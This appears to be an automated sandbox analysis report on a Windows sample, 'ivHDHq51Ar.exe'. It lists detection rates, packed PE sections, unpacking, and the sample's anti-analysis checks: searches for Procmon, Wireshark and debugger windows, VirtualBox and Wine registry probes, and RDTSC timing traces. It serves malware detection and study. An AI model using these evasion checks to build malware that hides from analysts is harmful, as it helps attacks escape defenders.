Source: C:\Users\user\Desktop\ivHDHq51Ar.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: ivHDHq51Ar.exeVirustotal: Detection: 43%
Source: ivHDHq51Ar.exeReversingLabs: Detection: 55%
Source: ivHDHq51Ar.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: ivHDHq51Ar.exeString found in binary or memory: Unable to complete request for channel-process-startup
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeSection loaded: kernel.appcore.dllJump to behavior
Source: ivHDHq51Ar.exeStatic file information: File size 4514816 > 1048576
Source: ivHDHq51Ar.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x289a00
Source: ivHDHq51Ar.exeStatic PE information: Raw size of niwiuhuq is bigger than: 0x100000 < 0x1c0e00

Data Obfuscation

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeUnpacked PE file: 0.2.ivHDHq51Ar.exe.150000.0.unpack :EW;.rsrc:W;.idata :W; :EW;niwiuhuq:EW;akfmfqsl:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;niwiuhuq:EW;akfmfqsl:EW;.taggant:EW;
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: ivHDHq51Ar.exeStatic PE information: real checksum: 0x4558aa should be: 0x450f36
Source: ivHDHq51Ar.exeStatic PE information: section name:
Source: ivHDHq51Ar.exeStatic PE information: section name: .idata
Source: ivHDHq51Ar.exeStatic PE information: section name:
Source: ivHDHq51Ar.exeStatic PE information: section name: niwiuhuq
Source: ivHDHq51Ar.exeStatic PE information: section name: akfmfqsl
Source: ivHDHq51Ar.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: 0_3_014E3AA0 push eax; ret 0_3_014E3AA1
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: 0_3_01500BEB push es; ret 0_3_01500C49
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: 0_3_01500BEB push es; ret 0_3_01500C49
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: 0_3_01500BEB push es; ret 0_3_01500C49
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: 0_3_01500BEB push es; ret 0_3_01500C49
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: 0_2_004D41D0 push eax; mov dword ptr [esp], edx0_2_004D41D5
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: 0_2_001D2340 push eax; mov dword ptr [esp], 00000000h0_2_001D2343
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: 0_2_0020C7F0 push eax; mov dword ptr [esp], 00000000h0_2_0020C743
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: 0_2_00190AC0 push eax; mov dword ptr [esp], 00000000h0_2_00190AC4
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeCode function: 0_2_001B1430 push eax; mov dword ptr [esp], 00000000h0_2_001B1433
Source: ivHDHq51Ar.exeStatic PE information: section name: niwiuhuq entropy: 7.9555945069961025

Boot Survival

barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeWindow searched: window name: RegmonClassJump to behavior
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeWindow searched: window name: FilemonclassJump to behavior
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior

Malware Analysis System Evasion

barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: ivHDHq51Ar.exe, 00000000.00000003.1499673839.0000000007167000.00000004.00001000.00020000.00000000.sdmp, ivHDHq51Ar.exe, 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: PROCMON.EXE
Source: ivHDHq51Ar.exe, 00000000.00000003.1499673839.0000000007167000.00000004.00001000.00020000.00000000.sdmp, ivHDHq51Ar.exe, 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: X64DBG.EXE
Source: ivHDHq51Ar.exe, 00000000.00000003.1499673839.0000000007167000.00000004.00001000.00020000.00000000.sdmp, ivHDHq51Ar.exe, 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: WINDBG.EXE
Source: ivHDHq51Ar.exe, 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: ivHDHq51Ar.exe, 00000000.00000003.1499673839.0000000007167000.00000004.00001000.00020000.00000000.sdmp, ivHDHq51Ar.exe, 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: WIRESHARK.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9D7FD3 second address: 9D7FDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9D7FDB second address: 9D7FF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FE1010EA790h 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9BCBE3 second address: 9BCBE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9BCBE9 second address: 9BCBFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE1010EA790h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9D6FF0 second address: 9D6FF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9D7684 second address: 9D76A5 instructions: 0x00000000 rdtsc 0x00000002 je 00007FE1010EA786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FE1010EA790h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 popad 0x00000013 push edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9D782A second address: 9D7836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9D7836 second address: 9D783C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9D783C second address: 9D7853 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE100E17072h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9D7853 second address: 9D7889 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FE1010EA78Eh 0x0000000a popad 0x0000000b push edx 0x0000000c jc 00007FE1010EA786h 0x00000012 pop edx 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push edi 0x00000018 push edi 0x00000019 pop edi 0x0000001a jp 00007FE1010EA786h 0x00000020 pop edi 0x00000021 jno 00007FE1010EA78Ch 0x00000027 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9D7889 second address: 9D7897 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FE100E17068h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9D7897 second address: 9D789D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9D9DF2 second address: 9D9DF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9D9DF6 second address: 9D9E42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FE1010EA78Ch 0x0000000c popad 0x0000000d mov eax, dword ptr [eax] 0x0000000f jns 00007FE1010EA799h 0x00000015 pushad 0x00000016 push esi 0x00000017 pop esi 0x00000018 jmp 00007FE1010EA78Fh 0x0000001d popad 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FE1010EA796h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9D9E42 second address: 9D9E48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9D9E8C second address: 9D9E91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9D9E91 second address: 9D9E97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9D9E97 second address: 9D9EE8 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE1010EA786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jns 00007FE1010EA795h 0x00000014 pop edx 0x00000015 nop 0x00000016 push 00000000h 0x00000018 jns 00007FE1010EA789h 0x0000001e push 2EFEC436h 0x00000023 pushad 0x00000024 jmp 00007FE1010EA798h 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9D9EE8 second address: 9D9F5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 popad 0x00000008 xor dword ptr [esp], 2EFEC4B6h 0x0000000f mov edx, edi 0x00000011 push 00000003h 0x00000013 pushad 0x00000014 clc 0x00000015 pushad 0x00000016 mov si, EEB3h 0x0000001a mov dl, D4h 0x0000001c popad 0x0000001d popad 0x0000001e push 00000000h 0x00000020 stc 0x00000021 push 00000003h 0x00000023 jnc 00007FE100E17069h 0x00000029 mov si, di 0x0000002c sub edi, dword ptr [ebp+129E1BE2h] 0x00000032 call 00007FE100E17069h 0x00000037 jmp 00007FE100E17077h 0x0000003c push eax 0x0000003d jne 00007FE100E17070h 0x00000043 mov eax, dword ptr [esp+04h] 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007FE100E1706Eh 0x0000004e rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9D9F5F second address: 9D9F7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE1010EA799h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9D9F7C second address: 9D9FFB instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE100E17066h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e pushad 0x0000000f jnc 00007FE100E1706Ch 0x00000015 jmp 00007FE100E1706Fh 0x0000001a popad 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f jmp 00007FE100E17077h 0x00000024 pop eax 0x00000025 pushad 0x00000026 mov esi, dword ptr [ebp+129E3979h] 0x0000002c add dword ptr [ebp+129E1C2Ch], ecx 0x00000032 popad 0x00000033 clc 0x00000034 lea ebx, dword ptr [ebp+12B63D2Bh] 0x0000003a mov dword ptr [ebp+129E1BE7h], edi 0x00000040 mov dword ptr [ebp+129E1D09h], edi 0x00000046 push eax 0x00000047 push ebx 0x00000048 pushad 0x00000049 jmp 00007FE100E17072h 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9DA05A second address: 9DA083 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FE1010EA786h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007FE1010EA792h 0x00000015 ja 00007FE1010EA786h 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9DA083 second address: 9DA0DA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov esi, dword ptr [ebp+129E3BE5h] 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push edi 0x00000014 call 00007FE100E17068h 0x00000019 pop edi 0x0000001a mov dword ptr [esp+04h], edi 0x0000001e add dword ptr [esp+04h], 00000016h 0x00000026 inc edi 0x00000027 push edi 0x00000028 ret 0x00000029 pop edi 0x0000002a ret 0x0000002b mov esi, dword ptr [ebp+129E3A81h] 0x00000031 push DF93EB37h 0x00000036 pushad 0x00000037 jmp 00007FE100E17078h 0x0000003c push eax 0x0000003d push edx 0x0000003e push edx 0x0000003f pop edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9DA1F2 second address: 9DA1F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9FA0AD second address: 9FA0E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push esi 0x00000006 jnl 00007FE100E17066h 0x0000000c jns 00007FE100E17066h 0x00000012 pop esi 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jno 00007FE100E17073h 0x0000001c jc 00007FE100E1706Eh 0x00000022 jns 00007FE100E17066h 0x00000028 push edx 0x00000029 pop edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9CD9FA second address: 9CDA09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FE1010EA786h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9FA250 second address: 9FA28B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FE100E17073h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FE100E17077h 0x00000015 jl 00007FE100E17066h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9FA3D1 second address: 9FA3D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9FA6DF second address: 9FA6E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9FA6E3 second address: 9FA6E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9FA6E9 second address: 9FA6F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9FA6F2 second address: 9FA70B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE1010EA794h 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9FA9A3 second address: 9FA9BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE100E17074h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9FA9BB second address: 9FA9C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9FA9C0 second address: 9FA9E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE100E1706Dh 0x00000009 jc 00007FE100E17066h 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9FA9E3 second address: 9FAA0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE1010EA798h 0x00000009 jbe 00007FE1010EA786h 0x0000000f popad 0x00000010 jc 00007FE1010EA788h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9FAB10 second address: 9FAB2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FE100E17070h 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9FAB2D second address: 9FAB33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9FAB33 second address: 9FAB4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 jmp 00007FE100E1706Ch 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9FAB4C second address: 9FAB58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push edi 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9FAB58 second address: 9FAB74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FE100E17075h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9CDA09 second address: 9CDA32 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FE1010EA786h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e pushad 0x0000000f popad 0x00000010 pop eax 0x00000011 jmp 00007FE1010EA795h 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9FAE2A second address: 9FAE30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9FAE30 second address: 9FAE34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9FB57E second address: 9FB584 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9FB7F1 second address: 9FB7F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9FB7F7 second address: 9FB7FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9FB7FB second address: 9FB820 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FE1010EA793h 0x0000000e push edx 0x0000000f pop edx 0x00000010 jns 00007FE1010EA786h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9FB820 second address: 9FB851 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FE100E17068h 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jne 00007FE100E17066h 0x00000011 pushad 0x00000012 popad 0x00000013 push edx 0x00000014 pop edx 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pushad 0x00000019 jnl 00007FE100E1706Ch 0x0000001f pushad 0x00000020 pushad 0x00000021 popad 0x00000022 pushad 0x00000023 popad 0x00000024 popad 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9FB851 second address: 9FB857 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9FB857 second address: 9FB85B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9FB85B second address: 9FB85F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9FB9B2 second address: 9FB9C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE100E1706Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 9FBC89 second address: 9FBC8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
